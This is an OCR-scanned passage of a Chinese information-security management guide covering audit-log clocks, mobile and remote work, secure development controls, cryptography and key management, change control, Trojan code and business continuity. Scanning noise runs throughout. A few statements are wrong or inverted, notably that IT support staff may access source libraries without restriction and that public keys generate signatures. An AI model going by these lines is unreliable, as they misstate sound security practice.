检查 案件 调查 中 或 要 将 审计 日 志 作为 证 据 都 要 求 其 准确 性 。 审 计 日 志 不 准确 ,就 可 能 妨碍 
此 类 调查 ,影响 此 类 证 据 的 可 靠 性 。 

如 果 计 算 机 或 通信 设备 能 使 用 实时 时 钟 , 就 应 该 按 公认 标准 对 时 钟 进行 设置 。 例 如 , 按 
照 统 一 协调 时 间 CUCTO 或 当地 标准 时 间 设 置 时钟 。 由 于 某 些 时 钟 可 能 时 间 不 准 , 所 以 应 
该 采用 对 任何 较 大 的 误差 可 以 进行 检查 和 调整 的 程序 。 
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7.7.8 移动 计算 和 远程 工作 


移动 计算 和 远程 工作 管理 的 目标 是 保证 在 使 用 移动 计算 和 远程 工作 设施 时 信息 的 安全 
性 。 要 求 采用 的 保护 措施 应 该 与 具体 工作 方式 可 能 产生 的 风险 相 一 致 。 移 动 计算 时 应 该 考 
虑 在 无 保护 的 环境 中 工作 的 风险 并 采用 适当 的 保护 措施 。 在 远程 工作 环境 下 ,组织 应 该 对 
远程 工作 场所 采用 一 定 的 保护 措施 ,保证 为 该 工作 方式 进行 适当 地 安排 。 

1. 移动 计算 

使 用 移动 计算 设备 (如 笔记 本 电脑 ,掌上 电脑 、 膝 上 型 电脑 和 移动 电话 ) 时 ,尤其 应 该 注 
意 保证 业务 信息 不 受 损坏 。 应 该 采用 正式 策略 ,考虑 移动 计算 设备 的 工作 风险 ,尤其 应 该 考 
虑 在 无 保护 的 环境 中 使 用 这 些 设备 的 风险 。 例 如 ,此 类 策略 应 该 包括 环境 保护 .访问 控制 、 
MERER .备份 和 防 病毒 要 求 。 该 策略 还 应 该 包括 移动 设备 联网 的 规则 和 建议 以 及 这 些 设 
备 在 公共 场所 使 用 的 指导 说 明 。 

在 公共 场所 会 议 室 以 及 组 织 工作 场所 以 外 的 其 他 无 保护 环境 中 ,使 用 移动 计算 设备 时 
应 该 十 分 谨慎 。 应 该 采用 一 定 的 保护 措施 ,避免 这 些 设 备 ( 如 采用 加 密 技术 的 设备 ) 存 储 和 
处 理 的 信息 遭 到 非法 访问 或 泄密 。 

在 公共 场所 使 用 此 类 设备 时 必须 注意 防范 被 未 经 授权 人 员 窥视 的 风险 。 应 该 制定 并 实 
时 更 新 用 于 防范 恶意 性 软件 的 程序 。 应 该 配备 必要 的 设备 以 对 信息 进行 方便 快捷 的 备份 。 
备份 的 信息 应 该 适当 地 了 予以 保护 ,如 防止 信息 被 盗 或 丢失 。 

应 该 对 联网 移动 设备 的 使 用 进行 适当 的 保护 。 使 用 移动 计算 设备 对 公用 网 上 的 商务 信 
息 进 行 远 程 访 问 时 必须 先 成 功 地 进行 身份 识别 和 验证 并 采用 适当 地 访问 控制 机 制 。 

还 应 防止 移动 计算 设备 被 盗 , 尤 其 是 丢 在 汽车 等 其 他 交通 工具 ,旅馆 、 会 议 中 心 以 及 聚 
会 场所 内 。 

内 含 重要 ,敏感 和 /或 关键 业务 信息 的 设备 不 应 无 人 看 管 。 如 果 可 能 ,应 该 上 锁 。 应 使 
用 专用 锁 来 保障 设备 的 安全 。 有 关 移 动 设 备 环境 保护 的 详细 信息 。 

应 该 对 进行 移动 计算 的 员工 安排 进行 培训 ,提高 他 们 对 此 种 工作 方式 引起 的 额外 风险 
的 防范 意识 以 及 对 应 该 采取 的 控制 措施 地 认识 。 

2. 远程 工作 

远程 工作 采用 通信 技术 ,使 员工 可 以 在 组 织 以 外 的 某 个 固定 地 点 远程 进行 工作 。 远 程 
工作 场所 应 该 切实 防止 盗窃 设备 和 信息 ,非法 公开 信息 、 对 组 织 内 部 系统 进行 远程 非法 访问 
或 滥用 设备 的 行为 等 。 远 程 工 作 必 须 得 到 管理 层 批准 并 由 管理 层 进行 控制 ,必须 对 这 种 工 
作 方 式 进行 切实 可 行 的 安排 。 

组 织 应 该 考虑 制定 相应 的 策略 ,程序 和 标准 ,对 远程 工作 活动 进行 控制 。 组 织 应 在 符合 
以 下 两 个 条 件 时 才 批 准 进行 远程 工作 活动 : 制定 了 适当 的 安全 措施 和 控制 措施 且 符 合 组 织 
的 安全 策略 。 

应 该 考虑 以 下 内 容 : 

CD 远程 工作 场所 的 现 有 环境 安全 情况 ,如 考虑 建筑 物 以 及 当地 环境 的 安全 情况 。 

(2) 拟 议 的 远程 工作 环境 。 

O 通信 安全 要 求 ,如 考虑 对 组 织 内 部 系统 的 远程 访问 需要 、 通 过 通信 和 链 路 访问 和 传输 
信息 的 敏感 性 以 及 内 部 系统 的 敏感 性 。 


(4) 他 人 (如 家 人 和 朋友 ) 使 用 提供 设备 对 信息 或 资源 进行 非法 访问 的 威胁 。 

应 考虑 以 下 控制 措施 和 方案 : 

(1) 提供 远程 工作 活动 所 需 的 适当 设备 和 存储 办 公设 备 。 

(2) 明确 说 明 可 以 开展 的 工作 、 工 作 时 间 、 可 以 保管 的 信息 种 类 以 及 远程 工作 人 员 有 权 
访问 的 内 部 系统 和 服务 。 

G) 提供 适当 的 通信 设备 ,包括 保障 远程 访问 安全 的 方法 。 

(4) 环境 安全 。 

(5) 有 关 家 人 和 客人 使 用 设备 访问 信息 的 规则 和 指导 说 明 。 

(6) 提供 软 硬 件 支持 和 维护 。 

CD 有 关 备 份 和 业务 连续 性 的 程序 。 

(8) 审计 和 安全 性 监控 。 

(9) 远程 工作 活动 结束 时 收回 权限 和 访问 权 以 及 设备 。 


7.8 系统 开发 与 维护 


信息 系统 内 应 建 有 安全 机 制 ,包括 基础 设施 、 业 务 应 用 程序 和 用 户 开发 的 应 用 程序 。 设 
计 和 实施 支持 应 用 或 服务 的 业务 进程 是 安全 的 关键 。 在 开发 信息 系统 前 应 该 确定 安全 要 
求 , 并 形成 统一 认识 。 所 有 安全 要 求 ,包括 后 退 安 排 ,都 应 该 在 项 目的 需求 阶段 确定 并 进行 
合理 说 明 ,然后 达成 一 致意 见 并 将 意见 备案 作为 信息 系统 整个 业务 的 组 成 部 分 。 

1. 安全 要 求 分 析 和 说 明 

新 系统 和 改进 系统 的 业务 要 求 陈述 应 指明 控制 措施 方面 的 要 求 。 这 些 说 明 应 考虑 系统 
包含 自动 控制 措施 时 ,还 需要 辅助 性 的 人 工控 制 措施 。 

在 评估 业务 应 用 程序 的 软件 包 时 ,也 应 做 与 此 相似 的 考虑 。 如 果 认为 合适 ,管理 层 可 能 
希望 使 用 经 过 独立 评估 和 鉴定 的 产品 。 

安全 要 求 和 控制 措施 应 体现 出 有 关 信息 资产 的 商业 价值 ,同时 反映 由 于 故障 或 缺少 安 
全 保护 造成 的 潜在 商业 损失 。 

分 析 安 全 要 求 并 确定 达到 要 求 的 控制 措施 的 指导 方针 是 风险 评估 和 风险 管理 。 

在 设计 阶段 引入 控制 措施 , 它 的 实施 和 维护 的 代价 要 远 远 小 于 在 实施 过 程 中 或 之 后 引 
入 的 控制 措施 。 

2. 应 用 系统 中 的 安全 

应 用 系统 应 防止 应 用 系统 中 用 户 数 据 的 丢失 、 修 改 或 滥用 。 应 用 系统 应 设计 包含 适当 
的 控制 措施 和 审计 追踪 或 活动 日 志 记录 ,包括 在 用 户 写 入 的 应 用 程序 中 。 这 些 系 统 应 包括 
对 输入 数据 、 内 部 处 理 和 输出 数据 的 检验 功能 。 处 理 敏感 有 价值 或 重要 的 组 织 资产 ,或 者 
对 这 些 资产 构成 影响 的 系统 还 需要 补充 其 他 控制 措施 。 这 些 控制 措施 是 根据 安全 要 求 和 风 
险 评估 确定 的 。 

3. 输入 数据 验证 

应 该 对 应 用 系统 的 数据 输入 进行 验证 ,保证 输入 数据 正确 并 合乎 要 求 。 应 对 业务 交易 
的 输入 ` 固 定数 据 ( 姓 名 和 地 址 、 信 用 限度 .客户 参考 数字 ) 和 参数 表 ( 销 售 价格 、 货 币 汇率 、 税 
率 ) 进 行 检查 。 应 该 考虑 采用 以 下 控制 措施 : 
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(1) 使 用 双 路 输入 或 其 他 输入 检查 来 查找 以 下 错误 : 超 范围 值 ; 数据 字段 中 的 无 效 字 
符 ; 遗漏 或 残缺 的 数据 ; 超过 数据 量 的 上 限 和 下 限 ; 非法 或 不 一 致 的 控制 数据 ; 定期 审查 
关键 字段 或 数据 文件 的 内 容 , 确 认 其 有 效 性 和 完整 性 ; 检查 硬 复制 输入 文档 是 否 有 对 输入 
数据 进行 非法 变更 (所 有 对 输入 文档 的 变更 应 经 过 授权 )。 

(2) 对 合法 性 错误 的 响应 步骤 。 

(3) 测试 似是而非 的 输入 数据 的 步骤 。 

(4) 规定 参与 数据 输入 过 程 的 所 有 人 员 的 责任 。 

4. 内 部 处 理 的 控制 

(1) 风险 区 域 

正确 输入 的 数据 可 能 会 因 处 理 错 误 或 故意 人 为 等 因素 遭 到 破坏 。 系 统 应 包含 有 效 性 检 
查 , 以 便 检查 这 类 破坏 。 应 用 程序 的 设计 应 确保 执行 某 些 约 束 最 大 限度 地 降低 处 理 错 误导 
致 完整 性 破坏 的 风险 。 要 考虑 的 特定 区 域 包括 : 使 用 添加 和 删除 功能 并 确定 它们 在 程序 中 
的 位 置 , 对 数据 进行 变更 ; 防止 程序 出 现 运行 顺序 错误 或 在 前 一 个 处 理 故障 后 运行 的 规程 
使 用 正确 程序 从 故障 中 恢复 ,确保 正确 处 理 数据 。 

(2) 检查 和 控制 措施 

需要 什么 控制 措施 取决 于 应 用 的 性 质 和 任何 数据 毁损 对 业务 的 影响 。 综 合 的 检查 措施 
的 示例 如 下 : 

(D 会 话 或 批 处 理 控制 措施 ,在 事务 更 新 后 协调 数据 文件 的 平衡 ; 

@ 平衡 控制 措施 ,针对 上 次 结束 时 的 平衡 检查 当前 使 用 的 平衡 , 即 : 循环 一 运行 控制 
措施 ; 

© 文件 更 新 总 数 ; 

@ 程序 到 程序 控制 措施 ; 

© 系统 生成 数据 的 有 效 性 ; 

© 检查 数据 完整 性 或 在 中 央 计 算 机 和 远程 计算 机 之 间 下 载 或 上 传 的 软件 ; 

CD 记录 和 文件 的 散 列 总 数 ; 

@ 检查 确保 在 正确 的 时 间 运 行 应 用 程序 ; 

检查 确保 按 正确 顺序 运行 程序 并 在 出 现 故障 时 中 止 ,在 问题 解决 前 暂停 处 理 。 

(3) 消息 验证 

消息 验证 是 一 种 检查 传输 的 电子 消息 的 内 容 是 否 有 非法 变更 或 破坏 的 技术 手段 。 它 可 
以 在 硬件 或 软件 上 实施 ,支持 物理 消息 验证 设备 或 软件 运算 法 则 。 

应 对 需要 安全 要 求 保护 消息 内 容 完整 性 的 应 用 程序 考虑 使 用 消息 验证 ,例如 ,电子 资金 
转移 或 其 他 类 似 电子 数据 交换 。 应 该 对 安全 风险 进行 评估 ,确定 是 否 需 要 消息 验证 并 寻找 
最 适合 的 实施 方法 。 

消息 验证 不 是 用 来 保护 消息 内 容 避 免 非法 访问 的 。 加 密 技 术 可 以 用 做 实现 消息 验证 的 
适合 手段 。 

(4) 输出 数据 验证 

应 该 对 从 一 个 应 用 系统 和 输出 的 数据 进行 验证 ,保证 对 所 存储 信息 的 处 理 正 确 且 合乎 实 
际 情况 。 一 般 而 言 ,构建 系统 的 前 提 条 件 是 已 经 经 过 适当 的 验证 ,这 样 检验 和 测试 输出 才 可 
以 始终 保持 正确 。 但 情况 并 非 总 是 如 此 。 


输出 验证 包括 : 正 反 检查 输出 数据 是 否 合理 ; 协调 控制 计数 确保 处 理 所 有 数据 ; 为 阅 
读 程 序 或 以 后 的 处 理 系统 提供 足够 信息 .确定 信息 的 准确 性 、 完 整 性 和 分 类 ; 处 理 输出 验证 
数据 的 程序 步骤 ; 规定 参与 数据 输出 过 程 的 所 有 人 员 的 责任 。 

5. 加密 控制 措施 

加 密 控 制 措施 的 目标 是 保护 信息 的 安全 性 、 真 实 性 或 完整 性 。 加 密 系统 和 技术 应 该 用 
于 保护 具有 风险 的 信息 和 那些 控制 措施 没有 提供 足够 保护 的 信息 。 

CD 加 密 控制 措施 的 使 用 策略 

决定 加 密 解决 方案 是 否 合适 应 看 做 是 评估 风险 和 选择 控制 措施 的 过 程 的 一 个 部 分 。 应 
进行 风险 评估 确定 给 予 信息 保护 的 水 平 。 评 估 结 果 还 可 以 用 来 确定 加 密 控 制 是 否 合适 ,应 
该 应 用 什么 类 型 的 控制 措施 以 及 用 于 什么 目的 和 业务 进程 。 为 保护 自己 的 信息 ,组 织 应 该 
制定 使 用 加 密 控制 的 策略 。 这 些 策略 是 最 大 化 使 用 加 密 技术 的 利益 和 最 小 化 使 用 风险 必 不 
可 少 的 ,并 避免 不 恰当 或 不 正确 的 使 用 。 制 定 策略 时 ,应 考虑 以 下 因素 

CD 在 组 织 范 围 内 使 用 加 密 控制 措施 的 管理 手段 ,包括 保护 业务 信息 的 一 般 原则 ; 

© 核心 管理 的 方法 ,包括 在 密 钥 丢失 破坏 的 情况 下 恢复 加 密 信息 的 方法 ; 

@ 作用 和 责任 。 例 如 谁 来 负责 ; 

© 实施 策略 ; 

© RAEM, 

© 如 何 确定 适当 的 加 密 保护 级 别 ; 

CD 在 组 织 内 为 有 效 实 施 采 用 的 标准 (什么 解决 方案 用 于 什么 样 的 业务 进程 )。 

(2) 加 密 

加 密 是 用 于 保护 信息 机 密 性 的 口令 技术 。 在 保护 敏感 或 关键 信息 时 应 考虑 使 用 它 。 

根据 风险 评估 ,在 考虑 使 用 的 加 密 算法 类 型 和 质量 以 及 加 密 密 钥 的 长 度 基 础 上 ,确定 需 
要 的 保护 级 别 。 在 实施 组 织 的 加 密 策略 时 ,应 该 考虑 法 律 和 国内 的 限制 是 否 适 用 于 在 其 他 
国家 和 地 区 使 用 加 密 技 术 ,是 否 会 造成 加 密 信 息 跨国 界 的 问题 。 另 外 ,应 该 考虑 控制 措施 是 
和 否 适 用 于 出 口 和 进口 加 密 技术 。 

应 该 征求 专家 意见 确定 适当 的 保护 级 别 , 选 择 合 适 的 产品 ,为 安全 系统 提供 必要 的 保 
护 ,并 执行 密 钥 管 理 。 另 外 ,有 关 适 用 组 织 计划 使 用 的 加 密 手 段 的 法 律 规定 ,需要 征求 法 律 
方面 的 意见 。 

(3) 数字 签名 

数字 签名 是 一 种 保护 电子 文档 的 真实 性 和 完整 性 的 方法 。 例 如 ,在 电子 商务 中 可 以 使 
用 它 ,因为 需要 验证 谁 签署 电子 文档 并 检查 已 签署 文档 的 内 容 是 否 被 更 改 。 

数字 签名 可 以 应 用 于 各 种 形式 的 电子 处 理 文档 ,例如 ,它们 可 以 用 于 电子 支付 、 资 金 转 
移 、 合 约 和 协议 。 可 以 使 用 加 密 技 术 实 现 数字 签名 ,方法 是 利用 一 对 唯一 相关 的 密 钥 ,其 中 
一 个 密 钥 用 于 创建 签名 (个 人 密 钥 ) , 另 一 个 用 于 检查 签名 (公开 密 钥 ) 。 

应 注意 保护 个 人 密 钥 的 保密 性 。 该 密 钥 应 秘密 保管 ,因为 得 到 该 密 钥 的 任何 人 都 可 以 
签署 文档 ,例如 支付 、 合 同等 ,然后 伪造 该 密 钥 主人 的 签名 。 另 外 ,保护 公开 密 钥 的 完整 性 也 
很 重要 ,使 用 公开 密 钥 证 明 来 进行 保护 。 

需要 考虑 所 使 用 的 签名 算法 的 类 型 和 质量 ,以 及 要 使 用 的 密 钥 长 度 。 用 于 数字 签名 的 
加 密 密 钥 应 与 用 于 加 密 操 作 的 密 钥 不 同 。 
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使 用 数字 签名 时 ,应 考虑 所 有 的 相关 立法 ,这些 法 规 说 明 合法 使 用 数字 签名 的 条 件 。 例 
如 ,在 电子 商务 中 ,理解 数字 签名 的 合法 性 十 分 重要 。 在 法 律 不 完善 的 地 方 ,需要 结合 合约 
或 其 他 协议 来 支持 数字 签名 的 使 用 。 另 外 ,有 关 适 用 组 织 计划 使 用 的 数字 签名 的 法 律 规定 ， 
需要 征求 法 律 方面 的 意见 。 

(4) 不 否认 服务 

在 需要 解决 某 个 事件 或 行为 是 否 发 生 的 纠纷 (如 在 电子 合约 或 支付 中 使 用 数字 签名 的 
纠纷 ) 时 ,应 该 使 用 不 否认 服务 。 它 们 可 以 帮助 确定 验证 某 个 事件 或 行为 是 否 发 生 的 证 据 ， 
例如 ,否认 使 用 电子 邮件 发 送 数字 签名 的 指令 。 这 些 服务 以 加 密 技 术 和 数字 签名 技术 的 使 
用 为 基础 。 

G) 密 钥 管 理 

加 密 密 钥 管理 是 有 效 使 用 加 密 技 术 的 关键 。 加 密 密 钥 的 破坏 或 丢失 可 能 导致 信息 的 保 
密 性 真实 性 和 完整 性 被 破坏 。 管 理 系统 应 该 支持 组 织 使 用 以 下 两 种 类 型 的 加 密 密 钥 。 

CD 秘密 密 钥 技术 。 几 个 当 事 方 共同 使 用 一 个 密 钥 ,这 个 密 钥 用 于 加 密 和 解密 信息 。 这 
个 密 钥 必须 秘密 保管 ,因为 获得 该 密 钥 的 任何 人 都 可 以 用 密 钥 解密 /加 密 的 信息 ,或 者 带 入 
非法 信息 。 

@ 公开 密 钥 技术 。 每 个 用 户 都 有 一 对 密 钥 : 一 个 公开 密 钥 ( 向 所 有 人 公开 ) 和 一 个 个 
人 密 钥 (必须 秘密 保管 )。 其 中 ,公开 密 钥 可 以 用 于 加 密 和 生成 数字 签名 。 

所 有 密 钥 都 应 该 保护 不 被 修改 和 破坏 ,秘密 密 钥 和 公开 密 钥 需要 保护 不 被 非法 暴露 。 
加 密 技 术 可 以 用 来 实现 这 一 目的 。 应 使 用 物理 保护 来 保护 用 于 生成 .存储 和 归档 密 钥 的 
设备 。 

密 钥 管理 系统 应 基于 一 组 认可 的 标准 、 程 序 和 安全 方法 : 为 不 同 的 加 密 系统 和 应 用 程 
序 生成 密 钥 ; 生成 并 获得 公开 密 钥 的 证 书 ; 将 密 钥 分 配给 目标 用 户 ,包括 在 收 到 密 钥 时 应 
如 何 激活 它 ; 存储 密 钥 ,包括 授权 用 户 如 何 获得 密 钥 使 用 权 ; 更 改 或 更 新 密 钥 ,包括 何 时 以 
及 如 何 更 改 密 钥 的 规则 ; 处 理 被 破坏 的 密 钥 ; 调用 密 钥 , 包 括 如 何 回收 或 失 活 密 钥 ,例如 ， 
密 钥 已 经 被 破坏 或 用 户 已 经 离开 组 织 ( 此 时 , 密 钥 应 该 归档 ); 恢复 丢失 或 破坏 的 密 钥 是 业 
务 连 续 性 管理 的 一 个 部 分 ,例如 恢复 加 密 信息 ; 归档 密 钥 ,例如 归档 或 备份 信息 ; 销毁 密 
钥 ; 记录 和 审查 密 钥 管理 的 相关 活动 。 

为 降低 破坏 的 可 能 性 ,应 确定 密 钥 激活 和 失 活 的 日 期 ,这 样 密 钥 只 能 在 限制 的 时 期 内 使 
用 。 这 个 时 期 取决 于 正在 使 用 密 钥 控制 措施 的 环境 和 预期 的 风险 。 需 要 考虑 处 理 使 用 密 钥 
的 法 律 请 求 ,例如 ,在 法 庭 上 需要 提供 解密 的 加 密 信息 来 作为 证 据 。 

除了 考虑 安全 管理 秘密 密 钥 和 个 人 密 钥 的 问题 外 ,还 应 该 考虑 保护 公开 密 钥 。 在 用 自 
己 的 公开 密 钥 蔡 换 某 个 用 户 的 公开 密 钥 ,就 会 产生 伪造 数字 签名 的 威胁 。 这 个 问题 通过 使 
用 公开 密 钥 证 书 来 解决 。 这 些 证 书 应 通过 以 下 方式 制作 : 唯一 的 将 与 公开 /个 人 密 钥 对 的 
所 有 人 相关 的 信息 与 公开 密 钥 绑 定 。 因 此 信赖 产生 证 书 的 管理 流程 是 很 重要 的 ,这 个 过 程 
通常 由 一 个 证 明 权 威 来 执行 , 它 是 一 个 得 到 承认 的 掌握 合适 控制 措施 和 方法 的 组 织 ,具有 所 
需要 的 信任 度 。 

与 提供 加 密 服务 的 外 部 供应 商 ( 如 某 个 证 明 权 威 机 构 ) 制 定 的 服务 水 平 协议 或 合约 应 包 
含 责任 、 服 务 的 可 靠 性 和 提供 服务 的 响应 时 间 等 问题 。 


6. 系统 文件 的 安全 

系统 文件 的 安全 管理 的 目标 是 确保 安全 地 进行 IT 项 目 和 支持 活动 。 应 控制 对 系统 文 
件 的 访问 。 保 护 系 统 完整 性 应 是 应 用 系统 或 软件 所 属 的 用 户 部 门 或 开发 小 组 的 责任 。 

CD 操作 软件 的 控制 

应 该 对 操作 系统 软件 的 实施 进行 控制 ,为 最 大 限度 降低 操作 系统 崩溃 的 风险 ,应 考虑 以 
下 控制 措施 。 

更 新 操作 系统 程序 库 应 由 获得 适当 管理 授权 的 指定 保管 员 来 执行 。 

如 有 可 能 ,操作 系统 应 只 保留 可 执行 代码 。 

在 获得 测试 成 功 和 用 户 接受 的 证 据 以 及 相关 的 程序 源 库 被 更 新 前 ,不 应 在 操作 系统 上 
执行 可 执行 代码 。 

应 维护 操作 程序 库 更 新 的 审计 日 志 记录 。 

保留 前 一 版 本 的 软件 作为 应 急 方法 。 

用 于 操作 系统 的 由 供应 商 提供 的 软件 应 保留 供应 商 的 支持 。 决 定 升级 到 新 发 行 版 时 应 
考虑 该 版 本 的 安全 性 , 即 引 入 新 的 安全 功能 或 影响 该 版 本 的 安全 问题 的 数量 和 严重 程度 。 
如 果 软 件 补丁 程序 可 以 帮助 克服 或 减少 安全 漏洞 ,那么 应 该 应 用 这 些 程序 。 

在 需要 的 时 候 经 过 管理 层 批准 ,应 只 给 供应 商 物 理 或 逻辑 的 访问 权限 以 便 提供 支持 服 
务 , 并 监视 供应 商 的 活动 。 

(2) 系统 测试 数据 的 保护 

应 该 保护 和 控制 测试 数据 ,系统 和 验收 测试 通常 需要 大 量 的 尽 可 能 与 操作 数据 接近 的 
测试 数据 ,应 该 避免 使 用 包含 个 人 信息 的 操作 数据 库 。 如 果 使 用 这 类 信息 ,那么 在 使 用 前 应 
该 做 非 个 性 化 处 理 。 在 操作 数据 用 于 测试 目的 时 ,应 用 以 下 控制 措施 来 保护 操作 数据 。 

适用 于 操作 应 用 系统 的 访问 控制 规程 也 应 该 适用 于 测试 应 用 系统 。 

每 次 应 使 用 不 同 的 授权 ,将 操作 信息 复制 到 测试 应 用 系统 。 

在 测试 完成 后 应 立即 将 操作 信息 从 测试 应 用 系统 中 清除 。 

应 该 记录 操作 信息 的 复制 和 使 用 情况 ,以 便 提 供 审计 追踪 。 

(3) 对 程序 源 代码 库 的 访问 控制 

为 减少 可 能 出 现 的 计算 机 程序 崩溃 ,应 按 以 下 方法 维护 对 访问 程序 源 库 的 严格 限制 。 

程序 源 库 应 尽 可 能 不 要 保存 在 操作 系统 上 。 

应 为 每 一 个 应 用 程序 指定 一 个 库 保 管 员 。 

IT 支持 人 员 应 不 受 限 制 地 访问 程序 源 库 。 

正在 开发 或 维护 的 程序 不 应 保留 在 操作 程序 源 库 中 。 

更 新 程序 源 库 和 向 程序 员 提 供 程序 源 应 通过 指定 的 库 保管 员 来 执行 ,并 且 获 得 IT 支 
持 管理 员 的 授权 。 

程序 清单 应 保存 在 安全 的 环境 中 。 

应 维护 访问 程序 库 的 审计 日 志 记 录 。 

应 对 旧版 本 的 源 程 序 进 行 归档 ,明确 指明 使 用 它们 操作 的 准确 日 其 和 时 间 以 及 所 有 支 
持 软件 ,作业 控制 ,数据 定义 和 过 程 。 

维护 和 复制 程序 源 库 应 受 严格 的 变更 控制 程序 的 约束 。 
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7. 开发 和 支持 过 程 中 的 安全 

开发 和 支持 过 程 中 的 安全 的 目标 是 维护 应 用 系统 软件 和 信息 的 安全 性 ,应 该 严格 控制 
项 目 和 支持 环境 。 负 责 应 用 程序 的 管理 员 还 应 该 负责 项 目 或 支持 环境 的 安全 。 他 们 应 该 确 
保 对 所 有 提议 的 系统 变更 进行 审查 ,检查 它们 是 否 破坏 系统 或 操作 环境 的 安全 。 

(1) 变更 控制 程序 

为 最 大 限度 地 减少 信息 系统 崩溃 ,应 对 变更 实行 严格 控制 。 应 该 强化 正式 的 变更 控制 
过 程 。 他 们 应 确保 不 破坏 安装 和 控制 的 程序 ,支持 只 赋予 程序 员 访 问 他 们 工作 需要 的 那 一 
部 分 系统 的 权限 ,在 进行 任何 变更 前 必须 获得 正式 的 许可 和 批准 。 

改变 应 用 软件 会 影响 操作 环境 。 在 适当 的 时 候 ,应 结合 操作 步骤 和 应 用 更 改 控制 步骤 。 

这 个 过 程 应 包括 以 下 内 容 : 

QD 维护 认可 授权 级 别 的 记录 ; 

© 确保 更 改 由 合法 用 户 提 交 ; 

© 检查 控制 措施 和 完整 性 步骤 ,确保 它们 没有 被 这 些 更 改 破 坏 ; 

@ 确定 所 有 需要 变更 的 计算 机 软件 、 信 息 、 数 据 库 实体 和 硬件 ; 

@ 在 正式 开始 前 应 获得 对 具体 提议 的 正式 批准 ; 

© 确保 合法 用 户 在 实施 前 接受 变更 ; 

@ 确保 执行 实施 ,最 大 限度 减少 业务 中 断 ; 

@ 确保 在 每 次 变更 完成 后 系统 文档 集 被 更 新 ,所 有 旧 文 档 被 归档 或 得 到 处 理 ， 

© 维护 所 有 软件 更 新 的 版 本 控制 ; 

O 维护 所 有 变更 请 求 的 审计 追踪 ; 

D 确保 操作 文档 和 用 户 过 程 根据 需要 进行 变更 ; 

四 确保 在 合适 的 时 间 执 行 变更 ,不 会 打 断 有 关 业 务 进程 。 

许多 组 织 都 维护 一 个 用 户 测试 新 软件 的 环境 ,这 个 环境 将 开发 环境 和 生产 环境 分 隔 开 。 
这 就 提供 一 个 方法 , 既 控 制 新 软件 ,又 可 以 保护 用 于 测试 目的 的 操作 信息 。 

(2) 操作 系统 变更 的 技术 评审 

定期 变更 操作 系统 是 必要 的 ,例如 ,安装 一 个 新 提供 的 软件 发 行 版 或 补丁 程序 。 发 生变 
更 时 ,应 对 应 用 系统 进行 审查 和 测试 ,确保 对 操作 和 安全 性 没有 负面 影响 。 这 个 过 程 应 
包括 : 

CD 审查 应 用 程序 控制 和 完整 性 过 程 确保 它们 没有 被 操作 系统 变更 所 破坏 ; 

@ 确保 每 年 的 支持 计划 和 预算 ,包括 操作 系统 变更 引起 的 审查 和 系统 测试 费用 ; 

© 确保 及 时 提供 操作 系统 变更 的 通知 ,以 便 在 实施 前 进行 检查 ; 

@ 确保 对 业务 连续 性 计划 做 适当 的 变更 。 

(3) 对 软件 包 变 更 的 限制 

不 鼓励 对 软件 包 进行 变更 。 使 用 供应 商 提供 的 软件 包 应 尽 可 能 不 做 变更 。 在 确实 需要 
修改 软件 包 的 情况 下 ,应 考虑 以 下 几 点 : 

CD 内 置 的 控制 措施 和 完整 性 进程 被 破坏 的 风险 ; 

@ 是 否 获 得 供应 商 的 同意 ; 

C) 当 标 准 程序 更 新 时 从 供应 商 获 得 所 需要 变更 的 可 能 性 ; 

CD 在 发 生变 化 时 组 织 是 否 负 责 以 后 的 软件 维护 的 影响 。 


如 果 变 更 是 不 可 避免 的 ,那么 应 保留 原始 软件 ,只 对 确定 的 副本 进行 变更 。 所 有 的 变更 
应 得 到 完整 的 测试 并 进行 记录 ,这 样 将 来 需要 对 软件 进行 升级 时 可 以 重新 应 用 这 些 变更 。 

(4) 隐蔽 通道 和 特洛伊 代码 

隐蔽 信道 可 以 通过 某 些 间 接 和 模糊 的 方法 暴露 信息 。 激 活 信道 的 方法 有 两 种 : 更 改 计 
算 系统 中 安全 和 不 安全 元 素 都 可 访问 的 参数 或 者 将 信息 嵌入 数据 流 。 特 洛 伊 代码 影响 以 非 
法 隐蔽 的 方式 影响 系统 ,这 些 代码 是 接收 者 或 程序 用 户 不 需要 的 。 

在 出 现 隐 蔽 信道 或 特洛伊 代码 的 地 方 , 应 考虑 以 下 方法 : 

O 只 从 信誉 较 好 的 地 方 购买 程序 ; 

© 购买 使 用 源 代码 的 程序 ,这 样 可 以 检测 代码 ; 

@ 使 用 经 过 评估 测试 的 产品 ; 

CD 在 操作 使 用 前 检查 所 有 源 代 码 ; 

C) 安装 后 控制 对 源 代码 的 访问 和 修改 ; 

© 只 允许 证 明 值得 信赖 的 人 员 使 用 关键 系统 。 

O 外 包 的 软件 开发 

当 软 件 开发 外 包 时 ,应 考虑 以 下 几 点 : 

(D 许可 管理 .代码 所 有 权 和 知识 产权 ; 

Q) 质量 证 明和 完成 工作 的 准确 性 ; 

O 在 出 现 第 三 方 事故 时 的 第 三 方 义务 条 款 ; 

@ 对 审计 完成 工作 的 质量 和 准确 性 的 访问 权限 ; 

C) 对 代码 质量 的 合同 要 求 ; 

© 在 安装 前 进行 测试 检查 是 否 有 特洛伊 式 的 代码 。 


7.9 业务 连续 性 管理 


业务 连续 性 管理 的 目标 是 防止 业务 活动 中 断 ,保证 重要 业务 流程 不 受 重大 故障 和 灾难 
的 影响 。 应 该 实施 业务 连续 性 管理 程序 ,预防 和 恢复 控制 相 结合 ,将 灾难 和 安全 故障 (可 能 
是 由 于 自然 灾害 .事故 ` 设 备 故障 和 蓄意 破坏 等 引起 ) 造 成 的 影响 降低 到 可 以 接受 的 水 平 。 
应 该 分 析 灾 难 、 安 全 故障 和 服务 损失 的 后 果 。 应 该 制订 和 实施 应 急 计划 ,确保 能 够 在 要 求 的 
时 间 内 恢复 业务 流程 。 应 该 维护 和 执行 此 类 计划 ,使 之 成 为 其 他 所 有 管理 程序 的 一 部 分 。 
业务 连续 性 管理 应 该 采用 控制 措施 ,确定 和 降低 风险 ,限制 破坏 性 事件 造成 的 后 果 , 确 保重 
要 操作 及 时 恢复 。 

1. 业务 连续 性 管理 程序 

应 该 在 整个 组 织 内 部 制定 培育 和 维护 业务 连续 性 的 管理 程序 。 还 应 该 包括 如 下 业务 连 
续 性 管理 的 主要 内 容 。 

(1) 了 解 组 织 所 面临 的 风险 ,考虑 其 可 能 性 和 影响 ,包括 确定 重要 业务 流程 及 其 优先 
级 别 。 

(2). 了 解 中 断 可 能 对 业务 造成 的 影响 (必须 找到 适当 的 解决 方案 ,正确 处 理 较 小 事故 以 
及 可 能 威胁 组 织 生存 的 大 事故 ), 并 确定 信息 处 理 设施 的 业务 目标 。 

